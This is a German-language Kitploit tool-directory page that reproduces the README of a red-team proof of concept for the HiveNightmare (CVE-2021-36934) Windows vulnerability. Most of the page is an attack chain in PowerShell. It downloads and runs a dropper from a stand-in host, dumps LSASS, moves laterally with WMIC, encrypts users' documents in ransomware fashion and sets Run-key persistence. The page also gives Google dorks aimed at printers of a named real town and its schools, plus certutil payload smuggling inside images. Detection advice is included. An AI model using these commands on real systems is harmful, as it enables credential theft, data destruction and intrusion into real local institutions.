Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Why-so-Serious-SAM — PoC-Schadsoftware, die den Exploit CVE-2021-36934 (falsche ACLs auf Schattenkopien) unter Verwendung einer dateilosen Red-Team-Methode auf Windows 10/11 mit LOLBins ausnutzt und SYSTEM- und SAM-Hives extrahiert, um lokale NTLM-Hashes zu erhalten. | Kitploit
Tools/GitHubGitHub/p1rat3r00t/why-so-serious-sam
Privilege EscalationExploitationLaterale BewegungPost-ExploitationCTFPenetrationstestsLernen & BildungRed TeamingLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

PoC-Schadsoftware, die den Exploit CVE-2021-36934 (falsche ACLs auf Schattenkopien) unter Verwendung einer dateilosen Red-Team-Methode auf Windows 10/11 mit LOLBins ausnutzt und SYSTEM- und SAM-Hives extrahiert, um lokale NTLM-Hashes zu erhalten.

Repository anzeigenWebseite
13vor 1 JahrNoch nicht geprüft

HiveNightmare 'Fileless' Exploit PoC:

Screenshot 2025-05-21 001453


Inhaltsverzeichnis

  • Überblick
  • Funktionen
  • Lab-Simulationsbeispiel
  • Aufklärung mit Google Dorks
  • LOLBins-Überblick
  • Fileless Dropper Embedding
  • Ausnutzung von Print Spooler & HiveNightmare
  • Reflective DLL Injection
  • MITRE ATT&CK Mapping
  • Erkennung & Minderung
  • Rechtlicher Hinweis
  • Referenzen & weiterführende Literatur

Überblick

CVE-2021-36934/HiveNightmare ist ein pädagogisches Forschungsprojekt für Red/Purple Teams, das ein fileless Malware-Angriffsframework unter Windows 11 simuliert. Es ermöglicht die Nachbildung realer Angriffsketten unter Verwendung von MITRE ATT&CK-Techniken mit Fokus auf heimliche, dateilose Aktionen.

Warnung: Nur für Forschung und Schulungen in isolierten Laboren. Nicht auf Produktions- oder nicht autorisierten Systemen verwenden.


Funktionen

  • Simuliert Ende-zu-Ende fileless Ransomware/Wiper-Angriffe
  • Demonstriert die Nutzung von Living Off the Land Binaries (LOLBins)
  • Zeigt Credential Access, Privilege Escalation, Lateral Movement und Persistenz
  • Enthält praktische Lab- und Aufklärungsbeispiele
  • Ordnet MITRE ATT&CK für Blue-Team-Erkennungsübungen zu

Lab-Simulationsbeispiel

Die folgende PowerShell-Simulation zeigt eine typische fileless Ransomware-Angriffskette unter Verwendung integrierter Windows-Tools (LOLBins):

root@kitploit:~
# Initial Access: Dropper laden
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Nutzlast decodieren und im Speicher laden
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/main/:Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# Dateiverschlüsselungsbeispiel
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistenz
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

Aufklärung mit Google Dorks

Beispielziel: Identifizierung öffentlich zugänglicher Druckerdienste in Moberly, Missouri, die möglicherweise anfällig für Exploits wie PrintNightmare sind.

Beispielhafte Google-Dork-Abfragen:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

LOLBins-Überblick

Living Off the Land Binaries (LOLBins) sind legitime, vertrauenswürdige Windows-Binärdateien, die häufig von Angreifern missbraucht werden, um Sicherheitskontrollen zu umgehen und dateilosen Schadcode auszuführen.

Beispielverwendung (Print Service Attack):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

Angreifer verwenden LOLBins wie rundll32.exe, regsvr32.exe und powershell.exe, um Nutzlasten von Netzwerkfreigaben auszuführen, oft nachdem sie über Aufklärung freigelegte Drucker oder Server identifiziert haben.


Fileless Dropper Embedding

Ziel: Nutzlasten unauffällig ausliefern, indem Archive in Bilder eingebettet und mit nativen Tools extrahiert werden.

Schritte:

  1. Nutzlast einbetten:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. Extrahieren und decodieren:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

Diese Methode umgeht die herkömmliche Filterung von Dateierweiterungen und nutzt integrierte Tools für eine ausweichende Zustellung.


Reflective DLL Injection

Technik: Laden und Ausführen einer schädlichen DLL direkt im Speicher mittels reflektiven Ladens.

Beispiel:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

Dies ermöglicht eine heimliche, speicherresidente Ausführung ohne Artefakte auf der Festplatte.


MITRE ATT&CK Mapping


Erkennung & Minderung

Erkennung

  • Sysmon + Sigma-Regeln:

    • Überwachung von rundll32.exe beim Laden von Nicht-System-DLLs
    • Achten auf ungewöhnliche Nutzung von certutil.exe, regsvr32.exe, mshta.exe
    • Verfolgen von Schattenkopie-Zugriffen durch Nicht-Administratoren
  • SIEM-Beispiele (ELK/Splunk):

    • Warnungen bei Ausführung von öffentlichen Freigaben
    • Auffällige Eltern/Kind-Prozessbeziehungen (z. B. explorer.exe startet rundll32.exe)
    • Verdächtige codierte Befehle in PowerShell oder CMD

Minderung

  • Deaktivieren des Druck-Spoolers, wo nicht benötigt:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • Alle Sicherheitspatches anwenden und ACLs härten
  • LOLBins mit AppLocker oder WDAC blockieren oder einschränken
  • EDR-Lösungen einsetzen, die reflektives DLL-Laden und speicherresidente Angriffe erkennen

Rechtlicher Hinweis

Sämtliche Inhalte, Codes und Techniken in diesem Repository sind ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt. Kein Teil dieses Projekts darf außerhalb kontrollierter, isolierter Umgebungen und ohne ausdrückliche Genehmigung verwendet werden. Die Autoren übernehmen keine Haftung für Missbrauch.


Referenzen & weiterführende Literatur

  • LOLOL Farm – LOLBin-Übungsfeld
  • LOLGEN – Erstellen von LOLBin-Ketten
  • Erkennung von SeriousSam
  • DLL-Injection-Grundlagen
  • Print Spooler Exploit Chain
  • Fileless Malware – Wikipedia
  • PrintSpoofer (Original)
  • HiveNightmare
  • Mitre Attck T1055
  • HiveNightmare Demo

Bleiben Sie sicher, forschen Sie verantwortungsbewusst und handeln Sie stets legal und ethisch.

Tool herunterladen
PhaseTechnikIDBeschreibung
Initial AccessGültige Konten / Drive-by-CompromiseT1078, T1189Kompromittierung öffentlich zugänglicher Druckerschnittstellen
ExecutionDLL Side-Loading / LOLBinsT1218, T1055.001Reflektives Ausführen von DLLs über vertrauenswürdige Binärdateien
Privilege EscalationPrint Spooler Exploits / Hive-ACL-MissbrauchT1068, T1003.002SYSTEM-Zugriff und SAM-Hash-Extraktion
Defense EvasionDateilose Ausführung / Verschleierte DateienT1027, T1202Codierte Nutzlasten, ausgeliefert über certutil, mshta usw.
Credential AccessLSASS-Dumping / SAM-Hive-ZugriffT1003Credential-Dumping nach HiveNightmare
Lateral MovementSMB/Net-Share-EnumerationT1021.002Ausbreitung über Druckerfreigaben oder Spooler-Enumeration
ImpactDatenvernichtung / VerschlüsselungT1485, T1486Fileless Wiperware, ausgelöst durch DLL-Nutzlasten